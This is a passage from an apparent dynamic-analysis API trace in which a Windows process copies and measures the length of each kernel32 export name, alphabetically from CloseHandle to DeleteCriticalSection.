lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.107] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.107] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.107] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.107] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.108] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.108] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.108] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.108] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.108] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.108] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.108] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.108] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.108] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.108] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.108] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.108] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.108] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.108] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.108] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.108] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.108] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.108] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.109] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.109] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.109] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.109] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.109] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.109] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.109] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.109] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.109] lstrlenA (lpString="COPYFILEA") returned 9 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.109] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.109] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.109] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.109] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.109] lstrlenA (lpString="COPYFILEW") returned 9 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.109] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.109] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.109] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.109] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.109] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.110] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.110] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.110] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.110] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.110] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.110] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.110] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.110] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.110] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.110] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.110] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.110] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.110] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.110] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.110] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.110] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.110] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.110] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.111] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.111] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.111] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.111] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.111] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.111] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.111] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.111] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.111] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.111] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.111] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.111] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.111] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.111] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.111] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.111] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.111] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.111] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.111] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.112] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.112] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.112] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.112] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.112] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.112] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.112] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.112] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.112] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.112] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.112] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.112] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.112] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.112] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.112] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.112] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.112] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.112] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.112] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.112] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.113] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.113] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.113] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.113] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.113] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.113] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.113] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.113] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.113] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.113] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.113] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.113] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.113] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.113] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.113] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.113] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.113] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.113] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.113] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.114] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.114] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.114] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.114] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.114] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.114] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.114] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.114] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.114] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.114] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.114] lstrlenA (lpString="DELETEATOM") returned 10 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.114] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.114] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.114] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.114] lstrcpyA (in: 